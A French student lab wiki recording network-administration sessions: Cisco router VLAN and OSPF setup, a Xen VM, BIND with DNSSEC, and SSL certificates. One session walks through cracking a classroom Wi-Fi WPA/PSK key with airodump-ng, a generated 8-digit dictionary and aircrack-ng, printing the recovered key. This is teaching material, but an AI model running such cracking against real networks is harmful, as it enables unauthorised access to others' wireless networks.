  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
